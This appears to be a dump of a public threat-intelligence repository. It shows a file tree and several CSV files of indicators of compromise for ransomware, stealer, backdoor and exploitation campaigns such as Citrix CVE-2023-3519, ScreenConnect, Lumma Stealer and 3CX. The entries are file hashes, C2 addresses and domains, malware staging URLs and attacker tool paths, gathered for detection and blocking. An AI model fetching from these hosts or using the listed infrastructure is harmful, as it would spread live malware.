├── 2023-08-25 Citrix CVE-2023-3519 attacks.csv ├── 2023-10-ColdFusion-ransomware-IOCs.csv ├── 2023-12 Akira followup.csv ├── 2024-02_Payloads_associated_with_ScreenConnect_attacks.csv ├── 2025 Lumma Stealer.csv ├── 20250205_SVGspam.csv ├── 2309 Tiny Turla backdoor.csv ├── 2310 CVE-2023-40044 wsftp ransomware.csv ├── 2311 Vice Society - Rhysida IoCs.csv ├── 2404 impersonation campaign.csv ├── 2505 DragonForce targets SimpleHelp RMM.csv ├── 3CX IoCs 2023-03.csv ├── 3proxy-backdoor-IOCs.csv ├── ATK-Brutel.csv ├── Andr-FakeApp.csv ├── Android-HiddAd-T ├── Android-fauxanticovid.csv ├── Android-pakchat.csv ├── Android_C23-spyware.csv ├── Atomic-infostealer-IOCs.csv ├── CVE-2018-0798 RTFs ├── CVE-2022-26134_attacks.csv ├── CVE-2022-3236_IOCs.csv ├── CloudChat-IOCs.csv ├── Cryptorom_fakeapps_2.csv ├── DLLsideloading-PlugX-USBworm-2023-03.csv ├── FlowerStormPaaS.csv ├── Follina_CVE-2022-30190_hashes.csv ├── FoolsGoldMetaTraderShaZhuPan.csv ├── IOC-sheet_gootloader2025.csv ├── IOC_imagespam.csv ├── IOC_quishing2024.csv ├── Iranian-banking-malware.csv ├── Karma_Conti_joint_IOCs.csv ├── MAILBOMB-TEAMS-RANSOMWARE.csv ├── Mal-BadNode.csv ├── Mal-EncPk-APV_IOCs.csv ├── Malspam-OtoGonderici ├── Malware-SystemBC.csv ├── Miner-Mrbminer.csv ├── Miner-Tor2Mine.csv ├── MoDi-RAT-reflective-injection.csv ├── Nitrogen 2023-07.csv ├── OWASSRF IOCs 2023-03.csv ├── PJobRAT_IOCs.csv ├── PUA-QuickCPU_xmr-stak.csv ├── Pacific_Rim_Asnarok_iocs.csv ├── Pacific_Rim_CVE-2020-15069_IOCs.csv ├── Pacific_Rim_Covert_Channels_IOCs.csv ├── Pacific_Rim_Cyberoam_acct_IOCs.csv ├── Pacific_Rim_Defending_Forward_IOCs.csv ├── Pacific_Rim_Personal_Panda_IOCs.csv ├── Pacific_Rim_Under_The_Radar_IOCs.csv ├── Qakbot-onenote-attacks.csv ├── README.md ├── Ransom-Lockbit_20220412.csv ├── Ransomware-AstroLocker.csv ├── Ransomware-BlackByte.csv ├── Ransomware-Conti.csv ├── Ransomware-Dharma-RaaS.csv ├── Ransomware-Dharma-console-history-toolbelt-script.txt ├── Ransomware-Egregor.csv ├── Ransomware-EpsilonRed.csv ├── Ransomware-LockBit ├── Ransomware-LockBit.csv ├── Ransomware-Lockbit3-IOCs.csv ├── Ransomware-Matrix ├── Ransomware-Maze.csv ├── Ransomware-MegaCortex ├── Ransomware-Midas.csv ├── Ransomware-MountLocker.csv ├── Ransomware-Netfilim.csv ├── Ransomware-Netwalker ├── Ransomware-Play.csv ├── Ransomware-ProLock.csv ├── Ransomware-Qilin-STAC4365.csv ├── Ransomware-REvil-Kaseya.csv ├── Ransomware-Ryuk.csv ├── Ransomware-Snatch ├── Ransomware_BlackCat - triple ransomware attack.csv ├── Ransomware_BlackKingDom.csv ├── Ransomware_DearCry.csv ├── Ransomware_Hive - triple ransomware attack.csv ├── Ransomware_Lockbit - triple ransomware attack.csv ├── Ransomware_Prolock_services_stopped.csv ├── Ransomware_prolock_processes_stopped.csv ├── STAC1807_June_update.csv ├── STAC6451_IOCs.csv ├── ShaZhuPanfakeapps.csv ├── Stealer-Baldr ├── Sunburst_blocklists.csv ├── Troj-Agent-BKJE.csv ├── Troj-AgentTesla.csv ├── Troj-BazarBackdoor.csv ├── Troj-BazarLd.csv ├── Troj-BuerLd-A.csv ├── Troj-DocDL-AEOL.csv ├── Troj-DropperAsAService.csv ├── Troj-Emotet-Ukraine_maldocs.csv ├── Troj-KilllSomeOne.csv ├── Troj-Kingmine ├── Troj-Miner-AED.csv ├── Troj-PS-FX.csv ├── Troj-Polazert_IOCs.csv ├── Troj-Qakbot.csv ├── Troj-Ransom-GXS.csv ├── Troj-gootloader.csv ├── Troj-gootloader.yara ├── Troj_Agent-BJJB.csv ├── Troj_GuLoader.csv ├── Trojan-Glupteba ├── Trojan-LDMiner.csv ├── Worm-Raspberry-Robin.csv ├── Worm-WannaCry ├── Zemana-driver-IoCs.csv ├── atk-backstab-d.csv ├── bitcoin-addys ├── crimson_palace_2.csv ├── crimson_palace_post-08-2023.csv ├── crimson_palace_prior_intrusions.csv ├── crimson_palace_stac1248-alpha.csv ├── crimson_palace_stac1305_charlie.csv ├── crimson_palace_stac1870_bravo.csv ├── defi-mining-scams-iocs.csv ├── double-dragon-breath-iocs.csv ├── email account compromise 365 2023-06.csv ├── files_hosted_on_discord.csv ├── fleeceware-chatbot-apps.csv ├── gootloader_cats_iocs.csv ├── mal-fakealert.csv ├── maldrivers_release_2.csv ├── malware-MyKings ├── malware-MyKings-domains ├── malware-MyKings-v2.csv ├── malware-Raticate ├── malware-raticate-cloudeye.csv ├── ms-msdt restore registry key.reg ├── papercut-nday-indicators-of-compromise.csv ├── raccoonstealer.csv ├── ransomware_atomsilo.csv ├── ransomware_memento.csv ├── repository-backdoor-IOCs.csv ├── smishing campaign targeting Indian customers 2023-04.csv └── usb worm with global reach.csv /2023-08-25 Citrix CVE-2023-3519 attacks.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | Description,Indicators of compromise and exploitation by threat actors using CVE-2023-3519,Source: https://infosec.exchange/@SophosXOps/110951651051968204 3 | IP,45.66.248.189,C2 server (Citrix incident) 4 | file_path_name,C:\Users\\Downloads\sh.ps1,Threat actor script (Citrix incident) 5 | IP,85.239.53.49,"C2 server (incident one, pre-Citrix)" 6 | file_path_name,C:\Users\%user%\Documents\gen.ps1,"Threat actor script (incident one, pre-Citrix)" 7 | file_path_name,C:\Users\%user%\Documents\faf.ps1,"Threat actor script (incident one, pre-Citrix)" 8 | file_path_name,C:\PerfLogs\Once.ps1,"(incident one, pre-Citrix)" 9 | file_path_name,C:\PerfLogs\plink.exe,"(incident one, pre-Citrix)" 10 | file_path_name,C:\PerfLogs\pscp.exe,"(incident one, pre-Citrix)" 11 | URL,173-44-141-47.nip.io,"C2 (incident one, pre-Citrix)" 12 | file_path_name,/var/netscaler/logon/LogonPoint/uiareas/%random%.php,"webshells found in this location on some Citrix servers, per https://www.shadowserver.org/news/technical-summary-of-observed-citrix-cve-2023-3519-incidents/" 13 | sha256,ec89ec41f0e0a7e60fa3f6267d0197c7fa8568e11a2c564f6d59855ddd9e1d64,"malicious .net DLL" 14 | sha256,bb28ba8d838c8eefdd5ae1e23d5872968d84e8cb86bf292b2c3bf4c84ad7dbd0,php webshell 15 | sha256,383df272841f9a677ee03f6f553bc6cf3197427d792dc9f86b7fb1911dc83d71,php webshell 16 | sha256,20b375ac4487a5955d4b0dd0a600e851d1e455a30c3f8babd0e7e1e97d11a073,malicious ps1 17 | sha256,857d6f7e4b96738adb9cc023e2c504362fe8b73bdce422f8f8cb791dd6ac2449,php webshell 18 | sha256,94f09d01e1397ca80c71b488b8775acfe2776b5ab42e9a54547d9e5f58caf11a,malicious .net DLL 19 | sha256,01717ce6fe0f79c4dc935549c516e4a1941cb4a4e84233e8fdff447177ce556e,php webshell 20 | sha256,03657d8f9dcb49a690d4b07da4f49ead58000efe458ca3ba7f878233dd25e391,php webshell 21 | sha256,2d53aaa2638f9a986779b9e36a7b6dfdaddf3cc06698f4aa9f558c1a0591dc9a,malicious .net DLL 22 | ,, 23 | -------------------------------------------------------------------------------- /2023-10-ColdFusion-ransomware-IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | Description,Indicators of compromise and exploitation by threat actor exploiting ColdFusion 11,Source: https://news.sophos.com/en-us/2023/10/19/ransomware-actor-exploits-coldfusion-servers-but-comes-away-empty-handed/ 3 | ip,185.74.222.92:44,repository for malware 4 | filename,watchdogs.ps1,CobaltStrike shellcode 5 | filename,invoke-powershelltcp.ps1,reverse PowerShell shell 6 | filename,oftenExcute.ps1,CobaltStrike shellcode 7 | filename,ftps.exe,CobaltStrike shellcode 8 | filename,LB3.exe,Ransomware - Possibly delivered through CS beacon 9 | filename,LKl23s.exe,Ransomware - Possibly delivered through CS beacon 10 | filename,evil.hta,HTML application to install CobaltStrike shellcode 11 | filename,Ww3wb.exe,Ransomware - Possibly delivered through CS beacon 12 | sha256,b1b8664a09a3157c656a2b7d920a8bf8f802ee026b3fdf0eb6028c943159757c,CobaltStrike Shellcode 13 | sha256,0f1e223eaf8b6d71f65960f8b9e14c98ba62e585334a6349bcd02216f4415868,Reverse PowerShell shell 14 | sha256,8984b4a0739c4a8645447b13ea13a1c8e900b8b71e56f5a17e03ad9632df12dd,CobaltStrike Shellcode 15 | sha256,7068468b8054fdcef61e2c740fb51b30007d2916e8faa65c119ec694e375b649,CobaltStrike Shellcode inject 16 | sha256,0f888a51e70f8d92e391999f4a37fbe3bcca770cd67dc0ed2f914e03b2fff31d,CobaltStrike shellcode 17 | sha256,d1d2df9dd639423ca622c20da49ede99b8405079d49215e5fee7e42bf086a1c5,Ransomware 18 | sha256,720ef38246a0cdb12212deeadcd93de2879e887712b47e21559e1bf771400979,HTML application to install CobaltStrike shellcode 19 | sha256,0bc225be15a50e1f718733feb9f6ad4c1bc6513acfd6348db85ee09cb3389c28,CobaltStrike shellcode 20 | sha256,60e2d81176b33fc198a495ffd8dc70e2052bd0452cfa2ba31229e905a5774dda,Ransomware - Possibly delivered through CS beacon 21 | sha256,c8c03e40cad417e9a93aa062004bb5748ba9989c271005524edc6eb5a4585e6e,Ransomware - Possibly delivered through CS beacon -------------------------------------------------------------------------------- /2023-12 Akira followup.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Note 2 | Description,https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomware-that-keeps-on-taking/,Akira followup post 3 | IP,45.227.254.26, 4 | IP,80.66.88.203, 5 | IP,91.240.118.29, 6 | IP,152.89.196.111, 7 | IP,194.26.29.102, 8 | IP,185.11.61.114, 9 | sha256,dfee389e1ffa09ed81adcf0d0f165d859e0c045ad7d90f6edcf3f96dfcceba2b,w.exe ransomware binary 10 | sha256,1c1ef7736dd95ea9aa2dc5784dc51977a1d890c92159e16315ef15546556bcdf,1.exe ransomware binary 11 | sha256,b711f7617f507053a131a75b0971409f76663b404aa1c51bfbe2cd32f2ac8fb8,Locker.exe ransomware binary 12 | sha256,681697c35dbb1beba9886f5c44882ccca32dd7e9e483a381e981e7409a0e35cb ,C:\programdata\start.bat 13 | sha256,be8257317bea80a1ed670d70eb4f21bba246c266a59724185b366c2dcfb2b8ea,C:\ProgramData\Microsoft\crome.exe 14 | sha256,2b02d732c6c46d8cb3758851c9e79a52761956109f55407c1a5d693a8a1af1f3,w.zip 15 | -------------------------------------------------------------------------------- /2024-02_Payloads_associated_with_ScreenConnect_attacks.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,Indicators related to malware abuse of ScreenConnect vulnerabilities,https://news.sophos.com/en-us/2024/02/23/connectwise-screenconnect-attacks-deliver-malware/ 3 | sha256,0d185ea3b0a49c2fa65bfd2757c9d0705657f0639fd36f196ac394fcd38c361d,malware. Uses Sophos in properties. 4 | sha256,11d2dde6c51e977ed6e3f3d3e256c78062ae41fe780aefecfba1627e66daf771,malware with Sophos name in properties; source hxxp://207.246.74.189:804/download/Diablo.log 5 | sha256,1362e6d43b068005f5d7c755e997e6202775430ac15a794014aa9a7a03a974e7,"hxxp://185.232.92.32:8888/Logs.txt - Malicious Data, which will be loaded by (SentinelAgentCore.dll)" 6 | sha256,19fc383683b34ba31ed055dc2e546a64eecbe06d79b6cc346773478c84f25f92,Installer for ScreenConnect distributed by threat actors. source hxxps://transfer.sh/get/6YoVhBPfKE/temp2.exe 7 | sha256,254714b7028005596fd56bdbe30bfc77f02bbe274048d0982118d93966e79331,"hxxp://185.232.92.32:8888/all.ps1 - Malicious Script downloads payload (SentinelUI.exe,SentinelAgentCore.dll,Logs.txt) - Sideloading " 8 | sha256,2da975fee507060baa1042fb45e8467579abf3f348f1fd37b86bb742db63438a,"""enc.exe"" ransomware executable" 9 | sha256,3818bb7adf60f8c2aeb5fe8c59b81fc7eb7f1471a80932610dc9a294ba7ba543,malware script that decodes to an executable. Source hxxp://91.238.181.238/a 10 | sha256,444338339260d884070de53554543785acc3c9772e92c5af1dff96e60e67c195,Payload from f1c7045badec0b9771da4a0f067eac99587d235d1ede35190080cd051d923da6 - %temp%\xw.exe 11 | sha256,55e4ce3fe726043070ecd7de5a74b2459ea8bed19ef2a36ce7884b2ab0863047 ,AnyDesk installer distributed by threat actors. Source hxxp://116.0.56.101:9191/images/Distribution.exe 12 | sha256,858ddfe6530fb00adb467f26e2c8f119fef284e1e9b6c92f0634f403ee3e7913,source hxxp://shapefiles.fews.net.s3.amazonaws.com:80/8gaLYHLcZ4DPV 13 | sha256,86b5d7dd88b46a3e7c2fb58c01fbeb11dc7ad350370abfe648dbfad45edb8132,Installer for SimpleHelp distributed by threat actors. source hxxps://transfer.sh/get/HcrhQuN0YC/temp3.exe 14 | sha256,8c2d246bf93bf84f6d4376cd46d8fcc3cb9c96d9bef7d42c23ff222d8f66eeaf,crypt64ult.exe ransomware executable inside of msappdata.msi 15 | sha256,8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600,source hxxp://23.26.137.225:8084/msappdata.msi 16 | sha256,9b3327f9ea7c02c6909a472a3c1abb562b19ae72d733a8e2e990e975b5f8a5d0,Payload from 3818bb7adf60f8c2aeb5fe8c59b81fc7eb7f1471a80932610dc9a294ba7ba543 - Cobalt Strike 17 | sha256,a39d9b1b41157510d16e41e7c877b35452f201d02a05afa328f1bcd53d8ee016,hxxp://185.232.92.32:8888/SentinelAgentCore.dll - Malicious DLL Component (Loader) 18 | sha256,a50d9954c0a50e5804065a8165b18571048160200249766bfa2f75d03c8cb6d0,Ransomware binary built using the leaked Lockbit 3 builder tool 19 | sha256,c94038781c56ab85d2f110db4f45b86ccf269e77a3ff4b9133b96745ff97d25f,"""UpdaterScreenConnect.exe"" malware" 20 | sha256,de42bd53cb0944da8bc33107796ecf296d00968725eed1763a8143cef90e2297,hxxp://185.232.92.32:8888/sentinelui.exe - Clean File used for sideloading malicious dll 21 | sha256,f1c7045badec0b9771da4a0f067eac99587d235d1ede35190080cd051d923da6 ,script that decodes itself to become a malware executable 22 | sha256,f3f5d3595559cad6019406d41f96fa88c69d693326cdf608c5fc4941fdf6a8ec,r.bat file that downloads 858ddfe6530fb00adb467f26e2c8f119fef284e1e9b6c92f0634f403ee3e7913 23 | sha256,b423d100e7aa2e576c8f21586f1d8924b34c3e9ed4cfdba40d121e21c3618445,decoded powershell script 24 | url,hxxp://116.0.56.101:9191/images/Distribution.exe,Anydesk installer distributed by threat actors 25 | url,hxxp://119.3.12.54:8000/identity_helper.exe,URL observed in ScreenConnect attacks. Payload not retrieved. 26 | url,hxxp://159.65.130.146:4444/a,URL observed in ScreenConnect attacks. Payload not retrieved. 27 | url,hxxp://159.65.130.146:4444/svchost.exe,URL observed in ScreenConnect attacks. Payload not retrieved. 28 | url,hxxp://185.232.92.32:8888/all.ps1,URL observed in ScreenConnect attacks. Payload not retrieved. 29 | url,hxxp://185.232.92.32:8888/Logs.txt,URL observed in ScreenConnect attacks. Payload not retrieved. 30 | url,hxxp://185.232.92.32:8888/SentinelAgentCore.dll,URL observed in ScreenConnect attacks. Payload not retrieved. 31 | url,hxxp://185.232.92.32:8888/sentinelui.exe,URL observed in ScreenConnect attacks. Payload not retrieved. 32 | url,hxxp://207.246.74.189:804/download/Diablo.log,Malicious stealer. File has properties that identify it as Sophos ML Model model.dll 33 | url,hxxp://91.238.181.238/a,3818bb7adf60f8c2aeb5fe8c59b81fc7eb7f1471a80932610dc9a294ba7ba543 34 | url,hxxps://transfer.sh/get/6YoVhBPfKE/temp2.exe,Installer for ScreenConnect distributed by threat actors 35 | url,hxxps://transfer.sh/get/HcrhQuN0YC/temp3.exe,Installer for SimpleHelp remote access utility distributed by threat actors 36 | -------------------------------------------------------------------------------- /2025 Lumma Stealer.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,A deep-dive look at research concerning Lumma Stealer,https://news.sophos.com/en-us/2025/05/09/lumma-stealer-coming-and-going/ ‎ 3 | url,hxxps[://]fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com/new-artist[.]txt ,Hosts PowerShell scripts which connects to other URLs and downloads zip file 4 | domain,snail-r1ced[.]cyou,Hosts PowerShell scripts which connect to other URLs and download zip file 5 | ip,104.21.84[.]251,IP addresses of the C2 (Command and Control) used 6 | filename,AutoIt3.exe,"File which, when downloaded, drops multiple files and copy all of them to produce the malicious autoit script in %temp% directory" 7 | sha1,SHA1: e298cd6c5fe7b9b05a28480fd215ddcbd7aaa48a,Hash value of AutoIt3.exe 8 | url,hxxps[://]FUGTGU76v1[.]b-cdn[.]net/nxt/ilt[.]txt,Hosts PowerShell script which connects to other URLs and downloads zip file 9 | url,hxxps[://]FUGTGU76v1[.]b-cdn[.]net/iltst[.]zip,Hosts PowerShell script which connects to other URLs and downloads zip file 10 | url,hxxps[:]//fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com/pioneer[.]txt,Hosts PowerShell script which connects to other URLs and downloads zip file 11 | url,hxxps[:]//fixedzip.oss-ap-southeast-5.aliyuncs.com/pioneer.zip,Hosts PowerShell script which connects to other URLs and downloads zip file 12 | url,hxxps[://]fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com/new-artist[.]txt,Hosts PowerShell script which connects to other URLs and downloads zip file 13 | url,hxxps[:]//fixedzip.oss-ap-southeast-5.aliyuncs.com/artist.zip,Hosts PowerShell script which connects to other URLs and downloads zip file 14 | url,hxxps[://]evolytix[.]com/wp-includes/fonts/CewtlSPn[.]txt,Hosts PowerShell script which connects to other URLs and downloads zip file 15 | ip,104[.]21[.]84[.]25,IP addresses of the C2 (Command and Control) used 16 | ip,156[.]59[.]126[.]78,IP addresses of the C2 (Command and Control) used 17 | ip,141[.]193[.]213[.]10,IP addresses of the C2 (Command and Control) used 18 | filename,ArtistSponsorship.exe ,"File when downloaded, drops multiple files and copy all of them to produce the malicious autoit script in %temp% directory" 19 | sha1,SHA1: e298cd6c5fe7b9b05a28480fd215ddcbd7aaa48a,Hash value of ArtistSponsorship.exe 20 | url,hxxps[://]www[.]googleadservices[.]com/pagead/aclk?sa=L&ai=DChcSEwi9isbdsrCKAxV1LXsHHZq8M0wYABAAGgJ0bQ&ae=2&aspm=1&co=1&ase=5&gclid=EAIaIQobChMIvYrG3bKwigMVdS17Bx2avDNMEAAYASAAEgKomfD_BwE&ohost=www[.]google[.]com&cid=CAASJuRosMAh_pmnrKgHnRyE4Lfiv_5QusyXIVc1HY8a6Eo87L0RZ4Qh&sig=AOD64_3NyGNBHFXQ9B_h3-F3Fyp0oe4HrQ&q&adurl&ved=2ahUKEwj95L3dsrCKAxU_zDgGHdUBKfsQ0Qx6BAgOEAE&nis=7&dct=1&suid=30426012769&ri=26,URL for malicious Google ad posing as a legitimate site 21 | url,hxxps[://]usermanualplatform[.]com/?gad_source=5&gclid=EAIaIQobChMIq7Dp5rKwigMVXaRmAh3uXySREAAYASAAEgLFUPD_BwE,URL that users are redirected to after clicking on the fake Google ad 22 | url,hxxps[://]usermahnualplatform-14[.]site/MNL14/instruction_695-18014-012_rev[.]php,Malicious URL that presents a Fake Captcha notification 23 | url,hxxps[://]klipdexypoi[.]shop/wassap[.]mp4 ,URL holding the initial payload for the Lumma Stealer malware 24 | domain,peelyitemsn[.]click,Hosts PowerShell scripts which connect to other URLs and download zip file 25 | domain,sordid-snaked[.]cyou,Hosts PowerShell scripts which connect to other URLs and download zip file 26 | domain,immureprech[.]biz,Hosts PowerShell scripts which connect to other URLs and download zip file 27 | domain,deafeninggeh[.]biz,Hosts PowerShell scripts which connect to other URLs and download zip file 28 | domain,effecterectz[.]xyz,Hosts PowerShell scripts which connect to other URLs and download zip file 29 | domain,diffuculttan[.]xyz,Hosts PowerShell scripts which connect to other URLs and download zip file 30 | domain,debonairnukk[.]xyz,Hosts PowerShell scripts which connect to other URLs and download zip file 31 | domain,wrathful-jammy[.]cyou,Hosts PowerShell scripts which connect to other URLs and download zip file 32 | domain,awake-weaves[.]cyou ,Hosts PowerShell scripts which connect to other URLs and download zip file 33 | filename,Nhtfrh.csv ,"File which, when downloaded, drops multiple files and copies all of them to produce the malicious autoit script in %temp% directory" 34 | sha1,SHA1: 337424610694e00ebac66d36dd20e535c7a92164,Hash value of Nhtfrh.csv 35 | -------------------------------------------------------------------------------- /2309 Tiny Turla backdoor.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | Description,Not So Tiny Turla,https://infosec.exchange/@SophosXOps/111109357153515214 3 | sha256,0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28,C:\Windows\System32\downlevel\ShellExperienceHost.exe 4 | file_path_name,C:\Windows\System32\downlevel\ShellExperienceHost.exe,filepath for 0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28 5 | sha256,2a2501121b69c63c8e11fe581b5cb57487ed17c386b6376a16c6eed590f1d40e,C:\Windows\Temp\cloudflared.exe 6 | file_path_name,C:\Windows\Temp\cloudflared.exe ,filepath for 2a2501121b69c63c8e11fe581b5cb57487ed17c386b6376a16c6eed590f1d40e 7 | sha256,5f4f01d97cce1f12c312be676dba3a8800881d89544117d83feed911d8968dd2,C:\Windows\System32\smpsvc.dll 8 | file_path_name,C:\Windows\System32\smpsvc.dll ,filepath for 5f4f01d97cce1f12c312be676dba3a8800881d89544117d83feed911d8968dd2 9 | sha256,d205fcadadf33d3d0ed7c0399861ce67f58c39b83ea27043a47d20575ff68873,Smphost.dat 10 | url,https://cache.chartbaet.com ,C2 11 | -------------------------------------------------------------------------------- /2310 CVE-2023-40044 wsftp ransomware.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | Description,CVE-2023-40044 wsftp ransomware,https://infosec.exchange/@SophosXOps/111222941977295158 3 | sha256,232a0585a7cb6c54e15d5410c96aac5913038e7f,GodPotato-NET35.exe 4 | sha256,34e4d070aafbaddb99d2851e0c08ba0b49ccf7c5,LB3.exe (Ransomware) 5 | sha256,8aebf427d02cddba5b58175ecf30da9f1df83de3,goodbye.ps1 6 | sha256,bf16b3222e52274a99fb4d18a7b0ad27927008ad,script.ps1 7 | -------------------------------------------------------------------------------- /2311 Vice Society - Rhysida IoCs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Note, 2 | Description,https://news.sophos.com/en-us/2023/11/10/vice-society-and-rhysida-ransomware/,"Same threats, different ransomware: a threat cluster’s switch from Vice Society to Rhysida; 11 November 2023", 3 | ip address ,5.39.222.67 ,C2 Server, 4 | ip address ,5.255.99.59,C2 Server, 5 | ip address ,51.77.102.106 ,C2 Server, 6 | ip address ,108.62.118.136,C2 Server, 7 | ip address ,108.62.141.161 ,C2 Server, 8 | ip address ,146.70.104.249 ,C2 Server, 9 | ip address ,156.96.62.58 ,C2 Server, 10 | ip address ,157.154.194.6,C2 Server, 11 | SHA256 hash,b25b87cfcedc69e27570afa1f4b1ca85aab07fd416c5d0228f1fe32886e0a9a6,PortStarter DLL, 12 | filename,C:\ProgramData\temp_l0gs\,Credential Dumping , 13 | filename,C:\Users\Public\secretsdump.exe,Credential Dumping Tool, 14 | filename,.LOCAL\s$\w.ps1,Data Collection Script, 15 | filename,s$\p1.ps1,Data Collection Script, 16 | filename,CriticalBreachDetected.pdf,Extortion Note, 17 | filename,C:\Downloads\MEGAsyncSetup64.exe,Mega Sync lnstaller, 18 | filename,C:\Downloads\Advanced_IP_Scanner_2.5.4594.1.exe,Network Scanner, 19 | filename, C:\Users\Public\main.dll,PortStarter DLL, 20 | filename,C:\ProgramData\schk.dll,PortStarter DLL, 21 | filename,C:\Windows\Tasks\windows32u.dll,PortStarter DLL, 22 | filename,C:\Windows\Tasks\windows32u.ps1,PortStarter Script, 23 | filename,Invoke-ZeroLogon.ps1,Privledge Escalation Script, 24 | filename,PsExec.exe,PsExec, 25 | filename,C:\s$\PsExec.exe,PsExec, 26 | filename,C:\Programdata\Veeam\svchost.ps1,SystemBC, 27 | filename,WinSCP.exe,WinSCP, 28 | filename,C:\ProgramData\AnyDesk.exe,Anydesk, 29 | -------------------------------------------------------------------------------- /2505 DragonForce targets SimpleHelp RMM.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,https://news.sophos.com/en-us/2025/05/27/dragonforce-actors-target-simplehelp-vulnerabilities-to-attack-msp-customers/,IoCs from research in article 3 | file_path,C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\working\toolbox-9759076704687761247\win.exe ,DragonForce ransomware binary  4 | sha256,cee6a7663fad90c807c9f5ea8f689afd0e4ece04f8c55d7a047a7215db6be210 ,DragonForce ransomware binary  5 | filename,PUSH PUSh PUUUUUSH.bat ,Batch script to list and clear all Windows Event logs  6 | file_path,C:\Users\\Videos\PUSH PUSh PUUUUUSH.bat ,Batch script to list and clear all Windows Event logs  7 | -------------------------------------------------------------------------------- /3CX IoCs 2023-03.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Note 2 | Description,https://news.sophos.com/en-us/2023/03/29/3cx-dll-sideloading-attack/ ‎,Indicators of 3CX DLL-sideloading exploitation Mar-2023 3 | SHA256,aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868,WIN: MSI 3cxdesktopapp-18.12.407.msi 4 | SHA256,59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983,WIN: 3cxdesktopapp-18.12.416.msi 5 | SHA256,c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02,WIN: ffmpeg.dll signed by 3CX Ltd - backdoored at entry point 6 | SHA256,7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896,WIN: ffmpeg.dll - backdoored at entry point 7 | SHA256,11be1803e2e307b647a8a7e02d128335c448ff741bf06bf52b332e0bbf423b03,WIN: d3dcompiler_47.dll 8 | SHA256,4e08e4ffc699e0a1de4a5225a0b4920933fbb9cf123cde33e1674fde6d61444f,File at http[:]//raw.githubusercontent[.]com/IconStorages/images/main/icon13.ico 9 | SHA256,a64fa9f1c76457ecc58402142a8728ce34ccba378c17318b3340083eeb7acc67,MAC: libffmpeg.dylib 10 | SHA256,e6bbc33815b9f20b0cf832d7401dd893fbc467c800728b5891336706da0dbcec,MAC: 3CXDesktopApp-18.12.416.dmg -- deprecated version of software 11 | URL,raw.githubusercontent.com/IconStorages/images/main/,Used for staging encoded malware 12 | URL,akamaicontainer[.]com,C2 (malware/callhome) 13 | URL,akamaitechcloudservices[.]com,C2 (malware/callhome) 14 | URL,azuredeploystore[.]com,C2 (malware/callhome) 15 | URL,azureonlinecloud[.]com,C2 (malware/callhome) 16 | URL,azureonlinestorage[.]com,C2 (malware/callhome) 17 | URL,dunamistrd[.]com,C2 (malware/callhome) 18 | URL,glcloudservice[.]com,C2 (malware/callhome) 19 | URL,journalide[.]org,C2 (malware/callhome) 20 | URL,msedgepackageinfo[.]com,C2 (malware/callhome) 21 | URL,msstorageazure[.]com,C2 (malware/callhome) 22 | URL,msstorageboxes[.]com,C2 (malware/callhome) 23 | URL,officeaddons[.]com,C2 (malware/callhome) 24 | URL,officestoragebox[.]com,C2 (malware/callhome) 25 | URL,pbxcloudeservices[.]com,C2 (malware/callhome) 26 | URL,pbxphonenetwork[.]com,C2 (malware/callhome) 27 | URL,pbxsources[.]com,C2 (malware/callhome) 28 | URL,qwepoi123098[.]com,C2 (malware/callhome) 29 | URL,sbmsa[.]wiki,C2 (malware/callhome) 30 | URL,sourceslabs[.]com,C2 (malware/callhome) 31 | URL,visualstudiofactory[.]com,C2 (malware/callhome) 32 | URL,zacharryblogs[.]com,C2 (malware/callhome) 33 | -------------------------------------------------------------------------------- /3proxy-backdoor-IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Note 2 | Description,https://news.sophos.com/en-us/2024/04/09/smoke-and-screen-mirrors-a-strange-signed-backdoor,Observed IOCs for incidents involving a 3proxy backdoor 3 | sha256,0dae9c759072f9c0e5a61a9de24a89e76da35ffab8ff9610cc90df417c741f3f,Variant 4 | sha256,cec73bddc33cd11ba515e39983e81569d9586abdaabbdd5955389735e826c3c7,Variant 5 | sha256,230c9c47abb17e3caa37bcb1b8e49b30e671e6c50e88f334107e3350bee13385,Variant 6 | sha256,5a519932c20519e58a004ddbfee6c0ed46f1cee8d7c04f362f3545335904bae2,Variant 7 | sha256,4c23a199152db6596ccafb5ea2363500e2e1df04961a4ede05168999da87d39a,Variant 8 | sha256,815e21de6fab4b737c7dd844e584c1fc5505e6b180aecdd209fbd9b4ed14e4b2,Variant 9 | sha256,0ee12274d7138ecd0719f6cb3800a04a6667968c1be70918e31c6f75de7da1ba,Variant 10 | sha256,acc5c46ae2e509c59a952269622b4e6b5fa6cf9d03260bfebdfaa86c734ee6ea,Variant 11 | sha256,593f8ed9319fd4e936a36bc6d0f163b9d43220e61221801ad0af8b1db35a0de5,Variant 12 | sha256,c0c648e98ec9d2576b275d55f22b8273a6d2549f117f83a0bcc940194f1d0773,Variant 13 | sha256,d6a1db6d0570576e162bc1c1f9b4e262b92723dbabdde85b27f014a59bbff70c,Variant 14 | sha256,eccfd9f2d1d935f03d9fbdb4605281c7a8c23b3791dc33ae8d3c75e0b8fbaec6,Variant 15 | 